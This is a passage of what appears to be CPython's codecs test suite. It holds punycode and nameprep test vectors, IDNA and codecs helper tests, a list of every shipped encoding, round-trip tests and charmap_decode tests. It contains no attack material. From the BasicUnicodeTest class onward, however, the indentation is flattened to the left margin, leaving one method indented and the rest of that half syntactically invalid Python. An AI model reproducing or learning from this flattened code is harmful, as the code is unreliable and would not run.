    ("\u0054\u1EA1\u0069\u0073\u0061\u006F\u0068\u1ECD\u006B"
     "\u0068\u00F4\u006E\u0067\u0074\u0068\u1EC3\u0063\u0068"
     "\u1EC9\u006E\u00F3\u0069\u0074\u0069\u1EBF\u006E\u0067"
     "\u0056\u0069\u1EC7\u0074",
     b"TisaohkhngthchnitingVit-kjcr8268qyxafd2f1b9g"),
    #(L) 3<nen>B<gumi><kinpachi><sensei>
    ("\u0033\u5E74\u0042\u7D44\u91D1\u516B\u5148\u751F",
     b"3B-ww4c5e180e575a65lsy2b"),
    # (M) <amuro><namie>-with-SUPER-MONKEYS
    ("\u5B89\u5BA4\u5948\u7F8E\u6075\u002D\u0077\u0069\u0074"
     "\u0068\u002D\u0053\u0055\u0050\u0045\u0052\u002D\u004D"
     "\u004F\u004E\u004B\u0045\u0059\u0053",
     b"-with-SUPER-MONKEYS-pc58ag80a8qai00g7n9n"),
    # (N) Hello-Another-Way-<sorezore><no><basho>
    ("\u0048\u0065\u006C\u006C\u006F\u002D\u0041\u006E\u006F"
     "\u0074\u0068\u0065\u0072\u002D\u0057\u0061\u0079\u002D"
     "\u305D\u308C\u305E\u308C\u306E\u5834\u6240",
     b"Hello-Another-Way--fc4qua05auwb3674vfr0b"),
    # (O) <hitotsu><yane><no><shita>2
    ("\u3072\u3068\u3064\u5C4B\u6839\u306E\u4E0B\u0032",
     b"2-u9tlzr9756bt3uc0v"),
    # (P) Maji<de>Koi<suru>5<byou><mae>
    ("\u004D\u0061\u006A\u0069\u3067\u004B\u006F\u0069\u3059"
     "\u308B\u0035\u79D2\u524D",
     b"MajiKoi5-783gue6qz075azm5e"),
    # (Q) <pafii>de<runba>
    ("\u30D1\u30D5\u30A3\u30FC\u0064\u0065\u30EB\u30F3\u30D0",
     b"de-jg4avhby1noc0d"),
    # (R) <sono><supiido><de>
    ("\u305D\u306E\u30B9\u30D4\u30FC\u30C9\u3067",
     b"d9juau41awczczp"),
    # (S) -> $1.00 <-
    ("\u002D\u003E\u0020\u0024\u0031\u002E\u0030\u0030\u0020"
     "\u003C\u002D",
     b"-> $1.00 <--")
    ]

# Sanity check at import time: every entry must be a (text, bytes) pair.
for i in punycode_testcases:
    if len(i)!=2:
        print(repr(i))
class PunycodeTest(unittest.TestCase):
    """Round-trip the RFC 3492 sample vectors through the punycode codec."""

    def test_encode(self):
        for text, expected in punycode_testcases:
            # Compare case-insensitively: some reference encodings use upper
            # case while our encoder emits only lower case, and since some
            # *input* characters are upper case too, lowering just the
            # expected value would not be enough.
            produced = str(text.encode("punycode"), "ascii")
            self.assertEqual(produced.lower(),
                             str(expected, "ascii").lower())

    def test_decode(self):
        for text, encoded in punycode_testcases:
            self.assertEqual(text, encoded.decode("punycode"))
            # Decoding an ASCII-round-tripped copy must give the same text.
            recoded = encoded.decode("ascii").encode("ascii")
            self.assertEqual(text, recoded.decode("punycode"))
class UnicodeInternalTest(unittest.TestCase):
    # The "unicode_internal" codec exposes the interpreter's internal code
    # point representation.  It is deprecated (and was removed in Python
    # 3.9), so uses below are wrapped in DeprecationWarning checks.

    @unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
    def test_bug1251300(self):
        # Decoding with unicode_internal used to not correctly handle "code
        # points" above 0x10ffff on UCS-4 builds.
        ok = [
            (b"\x00\x10\xff\xff", "\U0010ffff"),
            (b"\x00\x00\x01\x01", "\U00000101"),
            (b"", ""),
        ]
        not_ok = [
            b"\x7f\xff\xff\xff",
            b"\x80\x00\x00\x00",
            b"\x81\x00\x00\x00",
            b"\x00",
            b"\x00\x00\x00\x00\x00",
        ]
        # Test data above is big-endian; swap it on little-endian builds.
        for internal, uni in ok:
            if sys.byteorder == "little":
                internal = bytes(reversed(internal))
            with support.check_warnings():
                self.assertEqual(uni, internal.decode("unicode_internal"))
        for internal in not_ok:
            if sys.byteorder == "little":
                internal = bytes(reversed(internal))
            with support.check_warnings(('unicode_internal codec has been '
                                         'deprecated', DeprecationWarning)):
                self.assertRaises(UnicodeDecodeError, internal.decode,
                                  "unicode_internal")
        if sys.byteorder == "little":
            invalid = b"\x00\x00\x11\x00"
        else:
            invalid = b"\x00\x11\x00\x00"
        with support.check_warnings():
            self.assertRaises(UnicodeDecodeError,
                              invalid.decode, "unicode_internal")
        with support.check_warnings():
            self.assertEqual(invalid.decode("unicode_internal", "replace"),
                             '\ufffd')

    @unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
    def test_decode_error_attributes(self):
        # The raised UnicodeDecodeError must carry the codec name, the raw
        # input and the exact offending byte range.
        try:
            with support.check_warnings(('unicode_internal codec has been '
                                         'deprecated', DeprecationWarning)):
                b"\x00\x00\x00\x00\x00\x11\x11\x00".decode("unicode_internal")
        except UnicodeDecodeError as ex:
            self.assertEqual("unicode_internal", ex.encoding)
            self.assertEqual(b"\x00\x00\x00\x00\x00\x11\x11\x00", ex.object)
            self.assertEqual(4, ex.start)
            self.assertEqual(8, ex.end)
        else:
            self.fail()

    @unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
    def test_decode_callback(self):
        # A registered ignoring error handler skips the invalid word.
        codecs.register_error("UnicodeInternalTest", codecs.ignore_errors)
        decoder = codecs.getdecoder("unicode_internal")
        with support.check_warnings(('unicode_internal codec has been '
                                     'deprecated', DeprecationWarning)):
            ab = "ab".encode("unicode_internal").decode()
            ignored = decoder(bytes("%s\x22\x22\x22\x22%s" % (ab[:4], ab[4:]),
                                    "ascii"),
                              "UnicodeInternalTest")
            self.assertEqual(("ab", 12), ignored)

    def test_encode_length(self):
        with support.check_warnings(('unicode_internal codec has been '
                                     'deprecated', DeprecationWarning)):
            # Issue 3739
            encoder = codecs.getencoder("unicode_internal")
            self.assertEqual(encoder("a")[1], 1)
            self.assertEqual(encoder("\xe9\u0142")[1], 2)

            self.assertEqual(codecs.escape_encode(br'\x00')[1], 4)
# From http://www.gnu.org/software/libidn/draft-josefsson-idn-test-vectors.html
# Each entry is (UTF-8 input, expected UTF-8 output).  An expected output of
# None means the input contains prohibited characters and nameprep() must
# raise; an entry of (None, None) marks a vector skipped by this test suite.
nameprep_tests = [
    # 3.1 Map to nothing.
    (b'foo\xc2\xad\xcd\x8f\xe1\xa0\x86\xe1\xa0\x8bbar'
     b'\xe2\x80\x8b\xe2\x81\xa0baz\xef\xb8\x80\xef\xb8\x88\xef'
     b'\xb8\x8f\xef\xbb\xbf',
     b'foobarbaz'),
    # 3.2 Case folding ASCII U+0043 U+0041 U+0046 U+0045.
    (b'CAFE',
     b'cafe'),
    # 3.3 Case folding 8bit U+00DF (german sharp s).
    # The original test case is bogus; it says \xc3\xdf
    (b'\xc3\x9f',
     b'ss'),
    # 3.4 Case folding U+0130 (turkish capital I with dot).
    (b'\xc4\xb0',
     b'i\xcc\x87'),
    # 3.5 Case folding multibyte U+0143 U+037A.
    (b'\xc5\x83\xcd\xba',
     b'\xc5\x84 \xce\xb9'),
    # 3.6 Case folding U+2121 U+33C6 U+1D7BB.
    # XXX: skip this as it fails in UCS-2 mode
    #('\xe2\x84\xa1\xe3\x8f\x86\xf0\x9d\x9e\xbb',
    # 'telc\xe2\x88\x95kg\xcf\x83'),
    (None, None),
    # 3.7 Normalization of U+006a U+030c U+00A0 U+00AA.
    (b'j\xcc\x8c\xc2\xa0\xc2\xaa',
     b'\xc7\xb0 a'),
    # 3.8 Case folding U+1FB7 and normalization.
    (b'\xe1\xbe\xb7',
     b'\xe1\xbe\xb6\xce\xb9'),
    # 3.9 Self-reverting case folding U+01F0 and normalization.
    # The original test case is bogus, it says `\xc7\xf0'
    (b'\xc7\xb0',
     b'\xc7\xb0'),
    # 3.10 Self-reverting case folding U+0390 and normalization.
    (b'\xce\x90',
     b'\xce\x90'),
    # 3.11 Self-reverting case folding U+03B0 and normalization.
    (b'\xce\xb0',
     b'\xce\xb0'),
    # 3.12 Self-reverting case folding U+1E96 and normalization.
    (b'\xe1\xba\x96',
     b'\xe1\xba\x96'),
    # 3.13 Self-reverting case folding U+1F56 and normalization.
    (b'\xe1\xbd\x96',
     b'\xe1\xbd\x96'),
    # 3.14 ASCII space character U+0020.
    (b' ',
     b' '),
    # 3.15 Non-ASCII 8bit space character U+00A0.
    (b'\xc2\xa0',
     b' '),
    # 3.16 Non-ASCII multibyte space character U+1680.
    (b'\xe1\x9a\x80',
     None),
    # 3.17 Non-ASCII multibyte space character U+2000.
    (b'\xe2\x80\x80',
     b' '),
    # 3.18 Zero Width Space U+200b.
    (b'\xe2\x80\x8b',
     b''),
    # 3.19 Non-ASCII multibyte space character U+3000.
    (b'\xe3\x80\x80',
     b' '),
    # 3.20 ASCII control characters U+0010 U+007F.
    (b'\x10\x7f',
     b'\x10\x7f'),
    # 3.21 Non-ASCII 8bit control character U+0085.
    (b'\xc2\x85',
     None),
    # 3.22 Non-ASCII multibyte control character U+180E.
    (b'\xe1\xa0\x8e',
     None),
    # 3.23 Zero Width No-Break Space U+FEFF.
    (b'\xef\xbb\xbf',
     b''),
    # 3.24 Non-ASCII control character U+1D175.
    (b'\xf0\x9d\x85\xb5',
     None),
    # 3.25 Plane 0 private use character U+F123.
    (b'\xef\x84\xa3',
     None),
    # 3.26 Plane 15 private use character U+F1234.
    (b'\xf3\xb1\x88\xb4',
     None),
    # 3.27 Plane 16 private use character U+10F234.
    (b'\xf4\x8f\x88\xb4',
     None),
    # 3.28 Non-character code point U+8FFFE.
    (b'\xf2\x8f\xbf\xbe',
     None),
    # 3.29 Non-character code point U+10FFFF.
    (b'\xf4\x8f\xbf\xbf',
     None),
    # 3.30 Surrogate code U+DF42.
    (b'\xed\xbd\x82',
     None),
    # 3.31 Non-plain text character U+FFFD.
    (b'\xef\xbf\xbd',
     None),
    # 3.32 Ideographic description character U+2FF5.
    (b'\xe2\xbf\xb5',
     None),
    # 3.33 Display property character U+0341.
    (b'\xcd\x81',
     b'\xcc\x81'),
    # 3.34 Left-to-right mark U+200E.
    (b'\xe2\x80\x8e',
     None),
    # 3.35 Deprecated U+202A.
    (b'\xe2\x80\xaa',
     None),
    # 3.36 Language tagging character U+E0001.
    (b'\xf3\xa0\x80\x81',
     None),
    # 3.37 Language tagging character U+E0042.
    (b'\xf3\xa0\x81\x82',
     None),
    # 3.38 Bidi: RandALCat character U+05BE and LCat characters.
    (b'foo\xd6\xbebar',
     None),
    # 3.39 Bidi: RandALCat character U+FD50 and LCat characters.
    (b'foo\xef\xb5\x90bar',
     None),
    # 3.40 Bidi: RandALCat character U+FB38 and LCat characters.
    (b'foo\xef\xb9\xb6bar',
     b'foo \xd9\x8ebar'),
    # 3.41 Bidi: RandALCat without trailing RandALCat U+0627 U+0031.
    (b'\xd8\xa71',
     None),
    # 3.42 Bidi: RandALCat character U+0627 U+0031 U+0628.
    (b'\xd8\xa71\xd8\xa8',
     b'\xd8\xa71\xd8\xa8'),
    # 3.43 Unassigned code point U+E0002.
    # Skip this test as we allow unassigned
    #(b'\xf3\xa0\x80\x82',
    # None),
    (None, None),
    # 3.44 Larger test (shrinking).
    # Original test case reads \xc3\xdf
    (b'X\xc2\xad\xc3\x9f\xc4\xb0\xe2\x84\xa1j\xcc\x8c\xc2\xa0\xc2'
     b'\xaa\xce\xb0\xe2\x80\x80',
     b'xssi\xcc\x87tel\xc7\xb0 a\xce\xb0 '),
    # 3.45 Larger test (expanding).
    # Original test case reads \xc3\x9f
    (b'X\xc3\x9f\xe3\x8c\x96\xc4\xb0\xe2\x84\xa1\xe2\x92\x9f\xe3\x8c'
     b'\x80',
     b'xss\xe3\x82\xad\xe3\x83\xad\xe3\x83\xa1\xe3\x83\xbc\xe3'
     b'\x83\x88\xe3\x83\xabi\xcc\x87tel\x28d\x29\xe3\x82'
     b'\xa2\xe3\x83\x91\xe3\x83\xbc\xe3\x83\x88')
    ]
class NameprepTest(unittest.TestCase):
    def test_nameprep(self):
        """Run every vector from ``nameprep_tests`` against idna.nameprep().

        Entries whose input is None are skipped; entries whose expected
        output is None contain prohibited characters and must raise
        UnicodeError.
        """
        from encodings.idna import nameprep
        for pos, (orig, prepped) in enumerate(nameprep_tests):
            if orig is None:
                # Skipped vector (see the data table for the reason).
                continue
            # The Unicode strings are given in UTF-8; "surrogatepass" lets
            # vectors containing lone surrogates decode as well.
            orig = str(orig, "utf-8", "surrogatepass")
            if prepped is None:
                # Input contains prohibited characters
                self.assertRaises(UnicodeError, nameprep, orig)
            else:
                prepped = str(prepped, "utf-8", "surrogatepass")
                try:
                    self.assertEqual(nameprep(orig), prepped)
                except Exception as e:
                    # Chain the original failure ("from e") so its traceback
                    # is not lost when re-raising as TestFailed.
                    raise support.TestFailed(
                        "Test 3.%d: %s" % (pos + 1, str(e))) from e
class IDNACodecTest(unittest.TestCase):
    """Tests for the "idna" codec (internationalized domain names)."""

    def test_builtin_decode(self):
        for raw, expected in [
            (b"python.org", "python.org"),
            (b"python.org.", "python.org."),
            (b"xn--pythn-mua.org", "pyth\xf6n.org"),
            (b"xn--pythn-mua.org.", "pyth\xf6n.org."),
        ]:
            self.assertEqual(str(raw, "idna"), expected)

    def test_builtin_encode(self):
        for text, expected in [
            ("python.org", b"python.org"),
            ("python.org.", b"python.org."),
            ("pyth\xf6n.org", b"xn--pythn-mua.org"),
            ("pyth\xf6n.org.", b"xn--pythn-mua.org."),
        ]:
            self.assertEqual(text.encode("idna"), expected)

    def test_stream(self):
        stream = codecs.getreader("idna")(io.BytesIO(b"abc"))
        stream.read(3)
        # Input fully consumed: a further read yields the empty string.
        self.assertEqual(stream.read(), "")

    def test_incremental_decode(self):
        # iterdecode() fed one byte at a time must reassemble the name.
        for raw, expected in [
            (b"python.org", "python.org"),
            (b"python.org.", "python.org."),
            (b"xn--pythn-mua.org.", "pyth\xf6n.org."),
            (b"xn--pythn-mua.org.", "pyth\xf6n.org."),
        ]:
            pieces = (bytes([c]) for c in raw)
            self.assertEqual("".join(codecs.iterdecode(pieces, "idna")),
                             expected)
        # An incremental decoder only emits a label once its trailing dot
        # (or final=True) has been seen.
        decoder = codecs.getincrementaldecoder("idna")()
        self.assertEqual(decoder.decode(b"xn--xam", ), "")
        self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
        self.assertEqual(decoder.decode(b"rg"), "")
        self.assertEqual(decoder.decode(b"", True), "org")
        # reset() discards the buffered partial label.
        decoder.reset()
        self.assertEqual(decoder.decode(b"xn--xam", ), "")
        self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
        self.assertEqual(decoder.decode(b"rg."), "org.")
        self.assertEqual(decoder.decode(b"", True), "")

    def test_incremental_encode(self):
        for text, expected in [
            ("python.org", b"python.org"),
            ("python.org.", b"python.org."),
            ("pyth\xf6n.org.", b"xn--pythn-mua.org."),
            ("pyth\xf6n.org.", b"xn--pythn-mua.org."),
        ]:
            self.assertEqual(b"".join(codecs.iterencode(text, "idna")),
                             expected)
        # Mirror of test_incremental_decode for the encoder side.
        encoder = codecs.getincrementalencoder("idna")()
        self.assertEqual(encoder.encode("\xe4x"), b"")
        self.assertEqual(encoder.encode("ample.org"), b"xn--xample-9ta.")
        self.assertEqual(encoder.encode("", True), b"org")
        encoder.reset()
        self.assertEqual(encoder.encode("\xe4x"), b"")
        self.assertEqual(encoder.encode("ample.org."), b"xn--xample-9ta.org.")
        self.assertEqual(encoder.encode("", True), b"")
class CodecsModuleTest(unittest.TestCase):
    """Smoke tests for the top-level helpers of the codecs module."""

    def test_decode(self):
        self.assertEqual(codecs.decode(b'\xe4\xf6\xfc', 'latin-1'),
                         '\xe4\xf6\xfc')
        self.assertRaises(TypeError, codecs.decode)
        # With no encoding argument the default (UTF-8) is used.
        self.assertEqual(codecs.decode(b'abc'), 'abc')
        self.assertRaises(UnicodeDecodeError, codecs.decode, b'\xff', 'ascii')

    def test_encode(self):
        self.assertEqual(codecs.encode('\xe4\xf6\xfc', 'latin-1'),
                         b'\xe4\xf6\xfc')
        self.assertRaises(TypeError, codecs.encode)
        self.assertRaises(LookupError, codecs.encode, "foo", "__spam__")
        self.assertEqual(codecs.encode('abc'), b'abc')
        self.assertRaises(UnicodeEncodeError, codecs.encode, '\xffff', 'ascii')

    def test_register(self):
        self.assertRaises(TypeError, codecs.register)
        self.assertRaises(TypeError, codecs.register, 42)

    def test_lookup(self):
        self.assertRaises(TypeError, codecs.lookup)
        for bogus_name in ("__spam__", " "):
            self.assertRaises(LookupError, codecs.lookup, bogus_name)

    def test_getencoder(self):
        self.assertRaises(TypeError, codecs.getencoder)
        self.assertRaises(LookupError, codecs.getencoder, "__spam__")

    def test_getdecoder(self):
        self.assertRaises(TypeError, codecs.getdecoder)
        self.assertRaises(LookupError, codecs.getdecoder, "__spam__")

    def test_getreader(self):
        self.assertRaises(TypeError, codecs.getreader)
        self.assertRaises(LookupError, codecs.getreader, "__spam__")

    def test_getwriter(self):
        self.assertRaises(TypeError, codecs.getwriter)
        self.assertRaises(LookupError, codecs.getwriter, "__spam__")

    def test_lookup_issue1813(self):
        # Issue #1813: under Turkish locales, lookup of some codecs failed
        # because 'I' lowercases to a dotless i.
        oldlocale = locale.setlocale(locale.LC_CTYPE)
        self.addCleanup(locale.setlocale, locale.LC_CTYPE, oldlocale)
        try:
            locale.setlocale(locale.LC_CTYPE, 'tr_TR')
        except locale.Error:
            # Unsupported locale on this system
            self.skipTest('test needs Turkish locale')
        entry = codecs.lookup('ASCII')
        self.assertEqual(entry.name, 'ascii')
class StreamReaderTest(unittest.TestCase):
    """Tests for codecs stream readers over multibyte UTF-8 input."""

    def setUp(self):
        # UTF-8 bytes for U+D55C, a newline, and U+AE00.
        self.reader = codecs.getreader('utf-8')
        self.stream = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')

    def test_readlines(self):
        wrapped = self.reader(self.stream)
        self.assertEqual(wrapped.readlines(), ['\ud55c\n', '\uae00'])
class EncodedFileTest(unittest.TestCase):
    """Tests for the codecs.EncodedFile recoding wrapper."""

    def test_basic(self):
        # Reading: the file holds UTF-8 bytes, and EncodedFile hands them
        # out re-encoded as UTF-16-LE.
        backing = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')
        wrapper = codecs.EncodedFile(backing, 'utf-16-le', 'utf-8')
        self.assertEqual(wrapper.read(), b'\\\xd5\n\x00\x00\xae')
        # Writing: UTF-8 bytes written to the wrapper land in the file
        # re-encoded as Latin-1.
        backing = io.BytesIO()
        wrapper = codecs.EncodedFile(backing, 'utf-8', 'latin-1')
        wrapper.write(b'\xc3\xbc')
        self.assertEqual(backing.getvalue(), b'\xfc')
# Every str<->bytes codec shipped with Python; the BasicUnicodeTest suite
# below round-trips sample text through each of them.
all_unicode_encodings = [
    "ascii",
    "big5",
    "big5hkscs",
    "charmap",
    "cp037",
    "cp1006",
    "cp1026",
    "cp1125",
    "cp1140",
    "cp1250",
    "cp1251",
    "cp1252",
    "cp1253",
    "cp1254",
    "cp1255",
    "cp1256",
    "cp1257",
    "cp1258",
    "cp424",
    "cp437",
    "cp500",
    "cp720",
    "cp737",
    "cp775",
    "cp850",
    "cp852",
    "cp855",
    "cp856",
    "cp857",
    "cp858",
    "cp860",
    "cp861",
    "cp862",
    "cp863",
    "cp864",
    "cp865",
    "cp866",
    "cp869",
    "cp874",
    "cp875",
    "cp932",
    "cp949",
    "cp950",
    "euc_jis_2004",
    "euc_jisx0213",
    "euc_jp",
    "euc_kr",
    "gb18030",
    "gb2312",
    "gbk",
    "hp_roman8",
    "hz",
    "idna",
    "iso2022_jp",
    "iso2022_jp_1",
    "iso2022_jp_2",
    "iso2022_jp_2004",
    "iso2022_jp_3",
    "iso2022_jp_ext",
    "iso2022_kr",
    "iso8859_1",
    "iso8859_10",
    "iso8859_11",
    "iso8859_13",
    "iso8859_14",
    "iso8859_15",
    "iso8859_16",
    "iso8859_2",
    "iso8859_3",
    "iso8859_4",
    "iso8859_5",
    "iso8859_6",
    "iso8859_7",
    "iso8859_8",
    "iso8859_9",
    "johab",
    "koi8_r",
    "koi8_u",
    "latin_1",
    "mac_cyrillic",
    "mac_greek",
    "mac_iceland",
    "mac_latin2",
    "mac_roman",
    "mac_turkish",
    "palmos",
    "ptcp154",
    "punycode",
    "raw_unicode_escape",
    "shift_jis",
    "shift_jis_2004",
    "shift_jisx0213",
    "tis_620",
    "unicode_escape",
    "unicode_internal",
    "utf_16",
    "utf_16_be",
    "utf_16_le",
    "utf_7",
    "utf_8",
]

# The mbcs codec only exists on Windows builds.
if hasattr(codecs, "mbcs_encode"):
    all_unicode_encodings.append("mbcs")

# The following encoding is not tested, because it's not supposed
# to work:
#    "undefined"

# The following encodings don't work in stateful mode
broken_unicode_with_streams = [
    "punycode",
    "unicode_internal"
]
# These additionally lack usable incremental encoder/decoder support.
broken_incremental_coders = broken_unicode_with_streams + [
    "idna",
]
class BasicUnicodeTest(unittest.TestCase, MixInCheckStateHandling):
def test_basics(self):
s = "abc123" # all codecs should be able to encode these
for encoding in all_unicode_encodings:
name = codecs.lookup(encoding).name
if encoding.endswith("_codec"):
name += "_codec"
elif encoding == "latin_1":
name = "latin_1"
self.assertEqual(encoding.replace("_", "-"), name.replace("_", "-"))
with support.check_warnings():
# unicode-internal has been deprecated
(b, size) = codecs.getencoder(encoding)(s)
self.assertEqual(size, len(s), "encoding=%r" % encoding)
(chars, size) = codecs.getdecoder(encoding)(b)
self.assertEqual(chars, s, "encoding=%r" % encoding)
if encoding not in broken_unicode_with_streams:
# check stream reader/writer
q = Queue(b"")
writer = codecs.getwriter(encoding)(q)
encodedresult = b""
for c in s:
writer.write(c)
chunk = q.read()
self.assertTrue(type(chunk) is bytes, type(chunk))
encodedresult += chunk
q = Queue(b"")
reader = codecs.getreader(encoding)(q)
decodedresult = ""
for c in encodedresult:
q.write(bytes([c]))
decodedresult += reader.read()
self.assertEqual(decodedresult, s, "encoding=%r" % encoding)
if encoding not in broken_incremental_coders:
# check incremental decoder/encoder and iterencode()/iterdecode()
try:
encoder = codecs.getincrementalencoder(encoding)()
except LookupError: # no IncrementalEncoder
pass
else:
# check incremental decoder/encoder
encodedresult = b""
for c in s:
encodedresult += encoder.encode(c)
encodedresult += encoder.encode("", True)
decoder = codecs.getincrementaldecoder(encoding)()
decodedresult = ""
for c in encodedresult:
decodedresult += decoder.decode(bytes([c]))
decodedresult += decoder.decode(b"", True)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
# check iterencode()/iterdecode()
result = "".join(codecs.iterdecode(
codecs.iterencode(s, encoding), encoding))
self.assertEqual(result, s, "encoding=%r" % encoding)
# check iterencode()/iterdecode() with empty string
result = "".join(codecs.iterdecode(
codecs.iterencode("", encoding), encoding))
self.assertEqual(result, "")
if encoding not in ("idna", "mbcs"):
# check incremental decoder/encoder with errors argument
try:
encoder = codecs.getincrementalencoder(encoding)("ignore")
except LookupError: # no IncrementalEncoder
pass
else:
encodedresult = b"".join(encoder.encode(c) for c in s)
decoder = codecs.getincrementaldecoder(encoding)("ignore")
decodedresult = "".join(decoder.decode(bytes([c]))
for c in encodedresult)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
@support.cpython_only
def test_basics_capi(self):
from _testcapi import codec_incrementalencoder, codec_incrementaldecoder
s = "abc123" # all codecs should be able to encode these
for encoding in all_unicode_encodings:
if encoding not in broken_incremental_coders:
# check incremental decoder/encoder (fetched via the C API)
try:
cencoder = codec_incrementalencoder(encoding)
except LookupError: # no IncrementalEncoder
pass
else:
# check C API
encodedresult = b""
for c in s:
encodedresult += cencoder.encode(c)
encodedresult += cencoder.encode("", True)
cdecoder = codec_incrementaldecoder(encoding)
decodedresult = ""
for c in encodedresult:
decodedresult += cdecoder.decode(bytes([c]))
decodedresult += cdecoder.decode(b"", True)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
if encoding not in ("idna", "mbcs"):
# check incremental decoder/encoder with errors argument
try:
cencoder = codec_incrementalencoder(encoding, "ignore")
except LookupError: # no IncrementalEncoder
pass
else:
encodedresult = b"".join(cencoder.encode(c) for c in s)
cdecoder = codec_incrementaldecoder(encoding, "ignore")
decodedresult = "".join(cdecoder.decode(bytes([c]))
for c in encodedresult)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
def test_seek(self):
# all codecs should be able to encode these
s = "%s\n%s\n" % (100*"abc123", 100*"def456")
for encoding in all_unicode_encodings:
if encoding == "idna": # FIXME: See SF bug #1163178
continue
if encoding in broken_unicode_with_streams:
continue
reader = codecs.getreader(encoding)(io.BytesIO(s.encode(encoding)))
for t in range(5):
# Test that calling seek resets the internal codec state and buffers
reader.seek(0, 0)
data = reader.read()
self.assertEqual(s, data)
def test_bad_decode_args(self):
for encoding in all_unicode_encodings:
decoder = codecs.getdecoder(encoding)
self.assertRaises(TypeError, decoder)
if encoding not in ("idna", "punycode"):
self.assertRaises(TypeError, decoder, 42)
def test_bad_encode_args(self):
for encoding in all_unicode_encodings:
encoder = codecs.getencoder(encoding)
with support.check_warnings():
# unicode-internal has been deprecated
self.assertRaises(TypeError, encoder)
def test_encoding_map_type_initialized(self):
from encodings import cp1140
# This used to crash, we are only verifying there's no crash.
table_type = type(cp1140.encoding_table)
self.assertEqual(table_type, table_type)
    def test_decoder_state(self):
        """getstate()/setstate() of incremental coders must round-trip."""
        # Check that getstate() and setstate() handle the state properly
        u = "abc123"
        for encoding in all_unicode_encodings:
            # Codecs listed in broken_incremental_coders are known not to
            # support state save/restore and are skipped.
            if encoding not in broken_incremental_coders:
                self.check_state_handling_decode(encoding, u, u.encode(encoding))
                self.check_state_handling_encode(encoding, u, u.encode(encoding))
class CharmapTest(unittest.TestCase):
def test_decode_with_string_map(self):
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict", "abc"),
("abc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict", "\U0010FFFFbc"),
("\U0010FFFFbc", 3)
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab"
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab\ufffe"
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab"),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab\ufffe"),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab"),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab\ufffe"),
("ab", 3)
)
allbytes = bytes(range(256))
self.assertEqual(
codecs.charmap_decode(allbytes, "ignore", ""),
("", len(allbytes))
)
def test_decode_with_int2str_map(self):
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: 'c'}),
("abc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'Aa', 1: 'Bb', 2: 'Cc'}),
("AaBbCc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: '\U0010FFFF', 1: 'b', 2: 'c'}),
("\U0010FFFFbc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: ''}),
("ab", 3)
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b'}
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: None}
)
# Issue #14850
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: '\ufffe'}
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b'}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b', 2: None}),
("ab\ufffd", 3)
)
# Issue #14850
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b', 2: '\ufffe'}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b'}),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b', 2: None}),
("ab", 3)
)
# Issue #14850
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b', 2: '\ufffe'}),
("ab", 3)
)
allbytes = bytes(range(256))
self.assertEqual(
codecs.charmap_decode(allbytes, "ignore", {}),
("", len(allbytes))
)
def test_decode_with_int2int_map(self):
a = ord('a')
b = ord('b')
c = ord('c')
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: a, 1: b, 2: c}),
("abc", 3)
)
# Issue #15379
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 0x10FFFF, 1: b, 2: c}),
("\U0010FFFFbc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: sys.maxunicode, 1: b, 2: c}),
(chr(sys.maxunicode) + "bc", 3)
)
self.assertRaises(TypeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: sys.maxunicode + 1, 1: b, 2: c}
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: a, 1: b},
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
